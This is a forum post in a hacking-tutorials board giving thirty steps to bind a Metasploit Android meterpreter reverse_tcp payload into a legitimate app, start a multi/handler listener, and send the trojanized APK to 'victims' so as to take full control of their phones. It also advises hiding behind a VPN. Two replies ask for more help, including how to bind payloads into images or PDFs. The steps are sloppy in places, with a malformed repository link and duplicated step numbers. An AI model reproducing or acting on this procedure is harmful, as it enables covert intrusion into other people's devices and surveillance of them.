Creating virus to hack android .

Free Hacking Tutorials
User avatar
likethis
Posts: 556
Joined: Sun Apr 11, 2021 10:59 pm

Creating virus to hack android .

Postby likethis » Wed Aug 09, 2023 11:29 pm

image.9ZAB91.png
image.9ZAB91.png (813.96 KiB) Viewed 4650 times


Creating virus to hack android .
Before creating virus change your ip and
use vpn to download any file.
Steps:-
Step1- go to desktop and open your browser
Step2- download any android application less then 10 mb to bind
paylaod in apk.
Step3- Now go to google.com and type backdore.apk git hub and
open the top result.
Step4- Copy the link of that application by clicking on clone and
download
Step5- Go to desktop and type command cd desktop to change the
directory on desktopStep6- Type git clone and past the link that you had copied and
press enter that app will download in your desktop
Example to write command- git clone
https://github.com/dana.at.cp/backdore.apk.get
Step6- Open that folder and there you will see a folder
name
backdore.apk open that folder
Step7- Copy your Android apk and past into backdore.apk file.
Step8- Now cut that folder and go to desktop and open a new
terminal.
Step9- Type cd Desktop type to enter in the desktop and open a new
terminal.
step10- Type ls to see all the files in the current directory.
Step11- Then type cd backdore.apk and press enter.
Step12- Then you will enter on backdore.apk folder directory type
ls and press enter.
Step13- Then type cd backdore.apk and press enter then type is to
see the file of the backdore.apk
Step14- Type command chmod +× backdore.apk.sh and press enter
Step15- Type ./backdore-apk.sh then type your Android apk file
name and press enter.
Step16- Type 3 (meterpreter/reverce_tcp) it will ask you lhost
Step17- Open a new terminal and type ipconfig to see your ip copy
it.
Step18- past your ip to the lhost and press enter and remember that
you ip should be static to perform this attack in (wan)
Step19- now it will ask your port no type your port number but
your port should be forwarded then only it work if you don’t knowhow to port forward don’t worry just go to YouTube and type how
to port forward of router just watch any video and forward your
port no.
Step20- Now you will see lots of option but you just type 2 and
press enter.
Step21- Open the backdore apk file and and go to backdore file
again and open terminal through it.
Step22- Type service apache2 start
Step23- Then type service postgresql start.
Step24- Then type msfconsole
Step25- Then type multi/handler
Step26- Then type set payload android/meterpreter reverse_tcp
Step27- set lhost type your static ip
Step28- set lport port no which is forward
Step29- exploit
Send that apk file to your victims and ask to install when he will
open that app you will get all the control of his phone after
installing and opening the app
Step30- type help to see what-what you can do.

User avatar
thoungamba
Posts: 1
Joined: Fri Dec 01, 2023 5:06 pm

Re: Creating virus to hack android .

Postby thoungamba » Fri Dec 01, 2023 5:08 pm

I can't understand step number 16 help me plz

User avatar
cy@rud
Posts: 3
Joined: Mon Apr 08, 2024 6:06 pm

Re: Creating virus to hack android .

Postby cy@rud » Sun Apr 14, 2024 3:18 pm

plz explain how to bind img or pdf something like this


Return to “Hacking Tutorials”